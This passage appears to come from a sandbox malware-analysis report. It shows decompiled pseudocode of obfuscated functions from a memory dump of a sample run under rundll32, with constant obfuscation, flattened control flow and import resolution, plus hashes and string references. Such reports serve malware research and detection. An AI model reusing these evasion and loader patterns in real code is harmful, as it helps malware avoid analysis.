				_v52 = _v52 ^ 0xa5c60f20;
				_v52 = _v52 ^ 0xa5c47e1e;
				_v56 = 0x7c78;
				_v56 = _v56 ^ 0xeebdce6d;
				_v56 = _v56 + 0xffff293b;
				_v56 = _v56 + 0xffffd673;
				_v56 = _v56 ^ 0xeebcee70;
				_v32 = 0x8a69;
				_v32 = _v32 << 8;
				_v32 = _v32 + 0xffff19fe;
				_v32 = _v32 ^ 0x0089f6b6;
				_v44 = 0x259b;
				_t170 = 0x69;
				_v44 = _v44 / _t170;
				_v44 = _v44 >> 1;
				_t171 = 0x53;
				_v44 = _v44 / _t171;
				_v44 = _v44 ^ 0x00007293;
				_v20 = 0x858a;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x0cc036a9;
				_v20 = _v20 ^ 0x0cc00d6e;
				_v36 = 0x74da;
				_v36 = _v36 | 0x78e03973;
				_t172 = 0x7c;
				_v36 = _v36 / _t172;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xf31a9535;
				_v24 = 0x522a;
				_v24 = _v24 ^ 0x2ef4109f;
				_v24 = _v24 + 0xe245;
				_v24 = _v24 ^ 0x2ef5282b;
				_v4 = E001B0614();
				_t200 = _v48 + E001B0614() % _v8;
				_t167 = _v28 + E001B0614() % _v40;
				if(_t200 != 0) {
					_t194 = _t198;
					_t177 = _t200 >> 1;
					_t198 = _t198 + _t200 * 2;
					_t164 = memset(_t194, 0x2d002d, _t177 << 2);
					asm("adc ecx, ecx");
					memset(_t194 + _t177, _t164, 0);
				}
				E001A7468( &_v4, _t167, _t198, _v20, 3, _v36, _v24);
				 *((short*)(_t198 + _t167 * 2)) = 0;
				return 0;
			}

0x001bbd61
0x001bbd6b
0x001bbd7d
0x001bbd81
0x001bbd83
0x001bbd88
0x001bbd90
0x001bbd98
0x001bbda0
0x001bbda8
0x001bbdb5
0x001bbdb8
0x001bbdc4
0x001bbdc8
0x001bbdd0
0x001bbdd8
0x001bbde0
0x001bbde8
0x001bbdf0
0x001bbdf8
0x001bbe00
0x001bbe08
0x001bbe10
0x001bbe18
0x001bbe20
0x001bbe28
0x001bbe30
0x001bbe38
0x001bbe40
0x001bbe48
0x001bbe50
0x001bbe58
0x001bbe60
0x001bbe68
0x001bbe70
0x001bbe78
0x001bbe7d
0x001bbe85
0x001bbe8d
0x001bbe99
0x001bbe9e
0x001bbea4
0x001bbeac
0x001bbeb1
0x001bbeb7
0x001bbebf
0x001bbec7
0x001bbecc
0x001bbed4
0x001bbedc
0x001bbee4
0x001bbef0
0x001bbef3
0x001bbef7
0x001bbefc
0x001bbf04
0x001bbf0c
0x001bbf14
0x001bbf1c
0x001bbf31
0x001bbf52
0x001bbf69
0x001bbf6d
0x001bbf72
0x001bbf74
0x001bbf76
0x001bbf7e
0x001bbf80
0x001bbf82
0x001bbf85
0x001bbf9b
0x001bbfa5
0x001bbfaf

Strings

E, xrefs: 001BBF14
dC, xrefs: 001BBDF0
s9x, xrefs: 001BBEE4
x|, xrefs: 001BBE48

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: E$dC$s9x$x|
API String ID: 0-423376957
Opcode ID: 8f76caf4f9a64b8155c354e86a5f130c6aff43e2f2bb68330ee68cd9c4e3c8b6
Instruction ID: bc7a69b6c866d49e8b416413ffc31c38717a6a418dab3c80a31e6fc8ad86fd29
Opcode Fuzzy Hash: 8f76caf4f9a64b8155c354e86a5f130c6aff43e2f2bb68330ee68cd9c4e3c8b6
Instruction Fuzzy Hash: 325113B150C3419FE348CF25D48940BBBE1FBD8748F408A1DF199A62A0D7B4DA19CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001A7C4A, Relevance: 5.1, Strings: 4, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001A7C4A(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v124;
				void* _t87;
				signed int _t96;
				void* _t99;
				intOrPtr _t108;

				_v52 = _v52 & 0x00000000;
				_v60 = 0x62a4db;
				_v56 = 0x26486e;
				_v16 = 0x7871;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xf4d4;
				_v16 = _v16 ^ 0x000092e3;
				_v8 = 0xd593;
				_t96 = 0x2c;
				_t108 = _a4;
				_v8 = _v8 / _t96;
				_v8 = _v8 * 0x64;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x03ca51ad;
				_v20 = 0xa11;
				_v20 = _v20 + 0x1728;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x00000206;
				_v32 = 0x9b6c;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x00005854;
				_v28 = 0xbef6;
				_v28 = _v28 + 0xffff56f7;
				_v28 = _v28 ^ 0x0000627a;
				_v36 = 0x7f27;
				_v36 = _v36 * 0x1b;
				_v36 = _v36 ^ 0x000d0dbd;
				_v12 = 0xdc;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffffbf46;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xfc6220ee;
				_v24 = 0x6217;
				_v24 = _v24 ^ 0x31739121;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x000070a0;
				_t87 =  *((intOrPtr*)(_t108 + 0x18))( *((intOrPtr*)(_t108 + 0x2c)), 1, 0);
				_t111 = _t87;
				if(_t87 != 0) {
					E001A6A6F(_v8,  &_v124);
					_pop(_t99);
					_v48 =  &_v124;
					_v44 = E001B17BC( &_v40, _v20, _t111, _v32, _t99);
					 *((intOrPtr*)(_t108 + 0x18))( *((intOrPtr*)(_t108 + 0x2c)), 0xa,  &_v48, _v28);
					E001AED35(_v36, _v44, _v12, _v24);
				}
				return 0;
			}

0x001a7c50
0x001a7c56
0x001a7c5d
0x001a7c64
0x001a7c6b
0x001a7c6f
0x001a7c76
0x001a7c7d
0x001a7c8a
0x001a7c8d
0x001a7c90
0x001a7c9b
0x001a7c9e
0x001a7ca2
0x001a7ca9
0x001a7cb0
0x001a7cb7
0x001a7cba
0x001a7cc1
0x001a7cc8
0x001a7ccc
0x001a7cd3
0x001a7cda
0x001a7ce1
0x001a7ce8
0x001a7cf3
0x001a7cf6
0x001a7cfd
0x001a7d04
0x001a7d08
0x001a7d0f
0x001a7d13
0x001a7d1a
0x001a7d21
0x001a7d28
0x001a7d2c
0x001a7d36
0x001a7d39
0x001a7d3b
0x001a7d47
0x001a7d4d
0x001a7d5e
0x001a7d69
0x001a7d75
0x001a7d84
0x001a7d8a
0x001a7d91

Strings

TX, xrefs: 001A7CCC
zb, xrefs: 001A7CE1
nH&, xrefs: 001A7C5D
qx, xrefs: 001A7C64

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: TX$nH&$qx$zb
API String ID: 0-3187396103
Opcode ID: 87dba04fd43a8803187983bb752d7ee62ff1fbae1c5642221cfb9a06d5ffcfe0
Instruction ID: 6b4899b03ed117e4762137eb0fe00ec18af4ada4cce1eb858b90bc46b11e4130
Opcode Fuzzy Hash: 87dba04fd43a8803187983bb752d7ee62ff1fbae1c5642221cfb9a06d5ffcfe0
Instruction Fuzzy Hash: 0741E272C0460EEBDF14CFE0C94A9EEBBB1FB14314F208159D511B62A0E7B95A49DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BC48F, Relevance: 5.1, Strings: 4, Instructions: 68
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001BC48F(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v548;
				signed int _t86;
				signed int _t87;
				signed int _t88;

				_v28 = 0x216d;
				_v28 = _v28 + 0xa7e5;
				_v28 = _v28 + 0xffff3a71;
				_v28 = _v28 ^ 0x00001c6d;
				_v8 = 0xaeef;
				_v8 = _v8 + 0xffffdb8d;
				_t86 = 0x30;
				_v8 = _v8 / _t86;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x000013dd;
				_v12 = 0x5dd2;
				_t87 = 0x7d;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0xde0bd062;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0037ef22;
				_v20 = 0xd7e1;
				_v20 = _v20 ^ 0x2d6a8b3d;
				_v20 = _v20 + 0xffff7ed2;
				_v20 = _v20 ^ 0x2d69bbff;
				_v24 = 0x6c35;
				_t88 = 0x6c;
				_v24 = _v24 / _t88;
				_v24 = _v24 + 0xffff41da;
				_v24 = _v24 ^ 0xffff0368;
				_v16 = 0x2727;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0x5c50e2a3;
				_v16 = _v16 * 0x2a;
				_v16 = _v16 ^ 0x25452c88;
				E001B0065(_a8, _v28, _v8,  &_v548, _v12, _v20, _a4 + 0x2c);
				E001A7689(_v24, _v16,  &_v548);
				return 1;
			}

0x001bc498
0x001bc4a1
0x001bc4a8
0x001bc4af
0x001bc4b6
0x001bc4bd
0x001bc4c9
0x001bc4ce
0x001bc4d3
0x001bc4d7
0x001bc4de
0x001bc4e8
0x001bc4ed
0x001bc4f2
0x001bc4f9
0x001bc4fd
0x001bc504
0x001bc50b
0x001bc512
0x001bc519
0x001bc520
0x001bc52a
0x001bc530
0x001bc533
0x001bc53a
0x001bc541
0x001bc548
0x001bc54c
0x001bc557
0x001bc55d
0x001bc57b
0x001bc58d
0x001bc59b

Strings

m!, xrefs: 001BC498
"7, xrefs: 001BC4FD
5l, xrefs: 001BC520
'', xrefs: 001BC541

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "7$''$5l$m!
API String ID: 0-1842671497
Opcode ID: c95a713b3b8f34be7b54acffcc81a8ce3d8a36d8c5a14f677f14144b7afb7f26
Instruction ID: 20cbbb3b1d6af37149d9788521e69f93cc8dce284744519cfc450a8f58cc2341
Opcode Fuzzy Hash: c95a713b3b8f34be7b54acffcc81a8ce3d8a36d8c5a14f677f14144b7afb7f26
Instruction Fuzzy Hash: 0131F671D0020EEBEB48DFE4D98A9EEBBB5FB14314F208189D515B6290E3B85B558F80

Uniqueness

Uniqueness Score: -1.00%

Function 001AB7C2, Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

ar-KW, xrefs: 001AB7E8, 001ABB27, 001ABB74, 001ABB91, 001ABBCA
lr-, xrefs: 001AB934
/H, xrefs: 001ABA27

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ar-KW$lr-$/H
API String ID: 0-790155672
Opcode ID: 90f56d60c2ff9e82f782c68cf986c2782b657efaee2677fffc7eb765ff55e1f1
Instruction ID: 25f2f080927ba1c69b9429aebd7658dd6ac9bbdaf388ee45f9f9b5edba2b5a7f
Opcode Fuzzy Hash: 90f56d60c2ff9e82f782c68cf986c2782b657efaee2677fffc7eb765ff55e1f1
Instruction Fuzzy Hash: 61C11571D00319DBDB18CFE5C98A9DEFBB1FB58314F208159E116BA2A0D7B81A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001B6AD5, Relevance: 3.9, Strings: 3, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E001B6AD5(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				void* _t113;
				signed int _t122;
				signed int _t124;
				void* _t131;
				signed int _t137;
				intOrPtr* _t152;
				signed int _t153;
				signed int _t154;
				signed int* _t158;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t113);
				_v564 = 0x2e1d;
				_t158 =  &(( &_v604)[6]);
				_v564 = _v564 + 0xffff2df8;
				_v564 = _v564 ^ 0xffff756e;
				_t131 = 0x16b99a34;
				_v604 = 0x22f3;
				_v604 = _v604 + 0xc117;
				_v604 = _v604 ^ 0xd59440b8;
				_v604 = _v604 | 0xbe9b7d7a;
				_v604 = _v604 ^ 0xff9fffe8;
				_v572 = 0x42a;
				_v572 = _v572 ^ 0x91478bff;
				_v572 = _v572 + 0xffffcdcf;
				_v572 = _v572 ^ 0x91473180;
				_v576 = 0x3632;
				_v576 = _v576 ^ 0x3125205f;
				_t29 =  &_v576; // 0x3125205f
				_t153 = 0x41;
				_v576 =  *_t29 * 0x3e;
				_v576 = _v576 ^ 0xe6fb13e4;
				_v584 = 0x2c1e;
				_v584 = _v584 + 0x8805;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x02d0ecc1;
				_v580 = 0x1d8f;
				_v580 = _v580 / _t153;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x001d5df6;
				_v568 = 0xfcf4;
				_v568 = _v568 | 0x643978fc;
				_v568 = _v568 ^ 0x6439d8b9;
				_v588 = 0x76ff;
				_v588 = _v588 + 0x349d;
				_v588 = _v588 >> 2;
				_v588 = _v588 ^ 0x000000d3;
				_v600 = 0xafc6;
				_v600 = _v600 ^ 0x7a414f6e;
				_v600 = _v600 << 0xb;
				_t154 = 0x3e;
				_t155 = _v568;
				_v600 = _v600 / _t154;
				_v600 = _v600 ^ 0x003e7414;
				_v592 = 0xf6e8;
				_v592 = _v592 | 0x0194443a;
				_v592 = _v592 + 0x30;
				_v592 = _v592 ^ 0x0194fdd0;
				_v596 = 0x7b4;
				_v596 = _v596 + 0xffff6047;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0xff67df58;
				_v560 = 0x1e52;
				_v560 = _v560 + 0xdf63;
				_v560 = _v560 ^ 0x0000fdb7;
				do {
					while(_t131 != 0x1c5d7db) {
						if(_t131 == 0x699d9d9) {
							_t122 =  *_t152( &_v556, _a12);
							asm("sbb ecx, ecx");
							_t137 =  ~_t122 & 0xdab6f1fd;
							L13:
							_t131 = _t137 + 0x2ed6f5d7;
							continue;
						}
						if(_t131 == 0x98de7d4) {
							_t124 = E001AD633(_t155, _v580,  &_v556, _v568);
							asm("sbb ecx, ecx");
							_t137 =  ~_t124 & 0xd7c2e402;
							goto L13;
						}
						if(_t131 != 0x1007a90d) {
							if(_t131 == 0x16b99a34) {
								_t131 = 0x1007a90d;
								continue;
							} else {
								if(_t131 == 0x2ed6f5d7) {
									return E001B01E5(_v588, _v592, _t155, _v596);
								}
								goto L18;
							}
						}
						L10:
						_t124 = E001B5A86(_t131, _t131, _v560);
						_t155 = _t124;
						_t158 =  &(_t158[3]);
						if(_t124 != 0xffffffff) {
							_t131 = 0x1c5d7db;
							continue;
						}
						return _t124;
					}
					_v556 = 0x22c;
					if(E001B289F( &_v556, _v576, _v584, _t155) == 0) {
						_t131 = 0x2ed6f5d7;
						goto L18;
					} else {
						_t131 = 0x699d9d9;
						continue;
					}
					goto L10;
					L18:
				} while (_t131 != 0xe318343);
				return _t124;
			}

0x001b6adf
0x001b6ae6
0x001b6ae8
0x001b6aef
0x001b6af6
0x001b6afd
0x001b6afe
0x001b6aff
0x001b6b04
0x001b6b0c
0x001b6b0f
0x001b6b19
0x001b6b21
0x001b6b26
0x001b6b33
0x001b6b40
0x001b6b48
0x001b6b50
0x001b6b58
0x001b6b60
0x001b6b68
0x001b6b70
0x001b6b78
0x001b6b80
0x001b6b88
0x001b6b8f
0x001b6b92
0x001b6b96
0x001b6b9e
0x001b6ba6
0x001b6bae
0x001b6bb3
0x001b6bbb
0x001b6bcb
0x001b6bcf
0x001b6bd4
0x001b6bdc
0x001b6be4
0x001b6bec
0x001b6bf4
0x001b6bfc
0x001b6c04
0x001b6c09
0x001b6c11
0x001b6c19
0x001b6c21
0x001b6c2a
0x001b6c2d
0x001b6c31
0x001b6c35
0x001b6c3d
0x001b6c45
0x001b6c4d
0x001b6c52
0x001b6c5a
0x001b6c62
0x001b6c6a
0x001b6c6f
0x001b6c77
0x001b6c7f
0x001b6c87
0x001b6c8f
0x001b6c8f
0x001b6c9d
0x001b6d4b
0x001b6d51
0x001b6d53
0x001b6d38
0x001b6d38
0x00000000
0x001b6d38
0x001b6ca9
0x001b6d25
0x001b6d30
0x001b6d32
0x00000000
0x001b6d32
0x001b6cb1
0x001b6cb9
0x001b6ce7
0x00000000
0x001b6cbb
0x001b6cbd
0x00000000
0x001b6cd9
0x00000000
0x001b6cbd
0x001b6cb9
0x001b6cee
0x001b6d00
0x001b6d05
0x001b6d07
0x001b6d0d
0x001b6d0f
0x00000000
0x001b6d0f
0x001b6ce6
0x001b6ce6
0x001b6d68
0x001b6d79
0x001b6d85
0x00000000
0x001b6d7b
0x001b6d7b
0x00000000
0x001b6d7b
0x00000000
0x001b6d87
0x001b6d87
0x00000000

Strings

nOAz, xrefs: 001B6C19
_ %1, xrefs: 001B6B88
0, xrefs: 001B6C4D

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0$_ %1$nOAz
API String ID: 0-3467203319
Opcode ID: ade57f4fe86043723431dad03dba48ba64465489c554ad1e3f6a0c640fa31dae
Instruction ID: 9bfcc7a8a5f79c6671cab87472f512a3d7e6c922f6c15dc9cb8c5c9d7d3cba1a
Opcode Fuzzy Hash: ade57f4fe86043723431dad03dba48ba64465489c554ad1e3f6a0c640fa31dae
Instruction Fuzzy Hash: 50618C711083819FD7A8DE25C48946FBBE1EBD4358F104A1DF4DA922A0D779CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 001A7D94, Relevance: 3.9, Strings: 3, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001A7D94(void* __ecx, void* __edx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t76;
				signed short _t82;
				signed short _t85;
				signed short _t87;
				signed int _t89;
				intOrPtr _t90;
				signed short _t94;
				signed short* _t102;
				signed short _t104;
				void* _t105;
				signed int* _t106;

				_t106 =  &_v44;
				_v16 = 0x77e01;
				asm("stosd");
				_t105 = __ecx;
				_t89 = 0x45;
				asm("stosd");
				asm("stosd");
				_v32 = 0x737d;
				_v32 = _v32 + 0xe341;
				_v32 = _v32 ^ 0x000156bf;
				_v44 = 0x4d00;
				_v44 = _v44 << 5;
				_v44 = _v44 + 0xffffa257;
				_v44 = _v44 ^ 0xa2d66e40;
				_v44 = _v44 ^ 0xa2df3531;
				_v24 = 0xaca1;
				_v24 = _v24 | 0x541d16d2;
				_v24 = _v24 ^ 0x541dd906;
				_v28 = 0xdc4b;
				_v28 = _v28 + 0x3e43;
				_v28 = _v28 ^ 0x00016561;
				_v36 = 0x52d2;
				_v36 = _v36 | 0xacca9eaf;
				_v36 = _v36 >> 9;
				_v36 = _v36 / _t89;
				_v36 = _v36 ^ 0x00017c78;
				_v20 = 0x7ed4;
				_v20 = _v20 + 0xffff7f18;
				_v20 = _v20 ^ 0xffffb8e1;
				_v40 = 0x21ee;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe6635ee3;
				_v40 = _v40 + 0xffff583b;
				_v40 = _v40 ^ 0xe76b8038;
				_t76 = _v32;
				_t90 =  *((intOrPtr*)(__edx + 0x78 + _t76 * 8));
				if(_t90 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t76 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t104 = _t90 + __ecx;
					while(1) {
						_t79 =  *((intOrPtr*)(_t104 + 0xc));
						if( *((intOrPtr*)(_t104 + 0xc)) == 0) {
							goto L13;
						}
						_t94 = E001ADC59(_t79 + _t105, _v44, _v24, _v28);
						_v32 = _t94;
						__eflags = _t94;
						if(_t94 == 0) {
							L15:
							return 0;
						}
						_t102 =  *_t104 + _t105;
						_t87 =  *((intOrPtr*)(_t104 + 0x10)) + _t105;
						while(1) {
							_t82 =  *_t102;
							__eflags = _t82;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t84 = _t82 + 2 + _t105;
								__eflags = _t82 + 2 + _t105;
							} else {
								_t84 = _t82 & 0x0000ffff;
							}
							_t85 = E001B1CD1(_t94, _v36, _v20, _v40, _t84);
							_t106 =  &(_t106[3]);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							} else {
								_t94 = _v32;
								_t102 =  &(_t102[2]);
								 *_t87 = _t85;
								_t87 = _t87 + 4;
								__eflags = _t87;
								continue;
							}
						}
						_t104 = _t104 + 0x14;
						__eflags = _t104;
					}
					goto L13;
				}
			}

0x001a7d94
0x001a7d97
0x001a7dab
0x001a7dac
0x001a7db2
0x001a7db3
0x001a7db4
0x001a7db5
0x001a7dbd
0x001a7dc5
0x001a7dcd
0x001a7dd5
0x001a7dda
0x001a7de2
0x001a7dea
0x001a7df2
0x001a7dfa
0x001a7e02
0x001a7e0a
0x001a7e12
0x001a7e1a
0x001a7e22
0x001a7e2a
0x001a7e32
0x001a7e3d
0x001a7e41
0x001a7e49
0x001a7e51
0x001a7e59
0x001a7e61
0x001a7e69
0x001a7e6e
0x001a7e76
0x001a7e7e
0x001a7e86
0x001a7e8a
0x001a7e90
0x001a7f0a
0x00000000
0x001a7e99
0x001a7e99
0x001a7f03
0x001a7f03
0x001a7f08
0x00000000
0x00000000
0x001a7eb4
0x001a7eb6
0x001a7eba
0x001a7ebc
0x001a7f15
0x00000000
0x001a7f15
0x001a7ec3
0x001a7ec5
0x001a7efa
0x001a7efa
0x001a7efc
0x001a7efe
0x00000000
0x00000000
0x001a7ec9
0x001a7ed3
0x001a7ed3
0x001a7ecb
0x001a7ecb
0x001a7ecb
0x001a7ee2
0x001a7ee7
0x001a7eea
0x001a7eec
0x00000000
0x001a7eee
0x001a7eee
0x001a7ef2
0x001a7ef5
0x001a7ef7
0x001a7ef7
0x00000000
0x001a7ef7
0x001a7eec
0x001a7f00
0x001a7f00
0x001a7f00
0x00000000
0x001a7f03

Strings

^c, xrefs: 001A7E6E
C>, xrefs: 001A7E12
A, xrefs: 001A7DBD

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A$C>$^c
API String ID: 0-2805127395
Opcode ID: ec5b13b9b7a671a2e1ab6923ca7c0661cdd71d90ba0d41f145633eea2a1d1d66
Instruction ID: 7e0af423534a0fb55f7e1269b1b7961b244d98b75bfff22667f22e2d4d96cdc8
Opcode Fuzzy Hash: ec5b13b9b7a671a2e1ab6923ca7c0661cdd71d90ba0d41f145633eea2a1d1d66
Instruction Fuzzy Hash: BA41BCB550C3028FE359CF25D84552BBBE0FF95368F14091CE896922A0E3B8DB49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001A2A18, Relevance: 3.8, Strings: 3, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E001A2A18(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				void* _t110;
				void* _t122;

				_push(_a20);
				_push(0x104);
				_push(_a12);
				_v56 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(0x104);
				_v16 = 0x7ceb;
				_v16 = _v16 ^ 0x49d7f74a;
				_t122 = 0;
				_v16 = _v16 >> 5;
				_v16 = _v16 * 0x27;
				_v16 = _v16 ^ 0x59fe9250;
				_v12 = 0xb3c1;
				_v12 = _v12 + 0xffffb44d;
				_v12 = _v12 ^ 0xf3173633;
				_v12 = _v12 | 0xa0360c36;
				_v12 = _v12 ^ 0xf33726b3;
				_v8 = 0xcd86;
				_v8 = _v8 * 0x58;
				_v8 = _v8 << 1;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00002a19;
				_v32 = 0x91a;
				_v32 = _v32 | 0x3e099dbe;
				_v32 = _v32 ^ 0x3e09a592;
				_v40 = 0x763a;
				_v40 = _v40 | 0xee9404cc;
				_v40 = _v40 ^ 0xee941bd0;
				_v20 = 0xd020;
				_v20 = _v20 | 0xa6e548c3;
				_v20 = _v20 * 0xc;
				_v20 = _v20 + 0x9008;
				_v20 = _v20 ^ 0xd2c6c61f;
				_v36 = 0x82d2;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x00415dbf;
				_v52 = 0x37c;
				_v52 = _v52 + 0xd80c;
				_v52 = _v52 ^ 0x00008ee7;
				_v28 = 0xfa6a;
				_v28 = _v28 >> 9;
				_v28 = _v28 | 0xa6d36daa;
				_v28 = _v28 ^ 0xa6d32cf7;
				_v48 = 0x83ac;
				_v48 = _v48 + 0x5d4d;
				_v48 = _v48 ^ 0x00009b2d;
				_v44 = 0xc22;
				_v44 = _v44 + 0xe4dd;
				_v44 = _v44 ^ 0x0000f4cf;
				_v24 = 0xb3a6;
				_v24 = _v24 ^ 0xe8679b38;
				_v24 = _v24 | 0x9e5185d0;
				_v24 = _v24 ^ 0xfe77bdde;
				_t110 = E001B917E(__ecx, _a4, __ecx, _v24);
				_t121 = _t110;
				if(_t110 != 0) {
					_t122 = E001B293E(_a20, _v40, _t121, _v20,  &_v56, _v36);
					E001B01E5(_v52, _v48, _t121, _v44);
				}
				return _t122;
			}

0x001a2a20
0x001a2a28
0x001a2a29
0x001a2a2c
0x001a2a2f
0x001a2a32
0x001a2a35
0x001a2a36
0x001a2a37
0x001a2a3c
0x001a2a46
0x001a2a4d
0x001a2a4f
0x001a2a5a
0x001a2a5d
0x001a2a64
0x001a2a6b
0x001a2a72
0x001a2a79
0x001a2a80
0x001a2a87
0x001a2a92
0x001a2a95
0x001a2a98
0x001a2a9c
0x001a2aa3
0x001a2aaa
0x001a2ab1
0x001a2ab8
0x001a2abf
0x001a2ac6
0x001a2acd
0x001a2ad4
0x001a2adf
0x001a2ae2
0x001a2ae9
0x001a2af0
0x001a2af7
0x001a2afb
0x001a2b02
0x001a2b09
0x001a2b10
0x001a2b17
0x001a2b1e
0x001a2b22
0x001a2b29
0x001a2b30
0x001a2b37
0x001a2b3e
0x001a2b45
0x001a2b4c
0x001a2b53
0x001a2b5a
0x001a2b61
0x001a2b68
0x001a2b6f
0x001a2b86
0x001a2b8b
0x001a2b92
0x001a2bad
0x001a2bb9
0x001a2bbe
0x001a2bc8

Strings

:v, xrefs: 001A2AB8
|, xrefs: 001A2A3C
M], xrefs: 001A2B37

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :v$M]$|
API String ID: 0-2341810049
Opcode ID: c1c0a54199be8e331de8a8420f008398ac793de1df3376338769777aa326275e
Instruction ID: f00024f9d04ea319c093dc616163043847c83d9db21d7d8eb7db4164458c6a9e
Opcode Fuzzy Hash: c1c0a54199be8e331de8a8420f008398ac793de1df3376338769777aa326275e
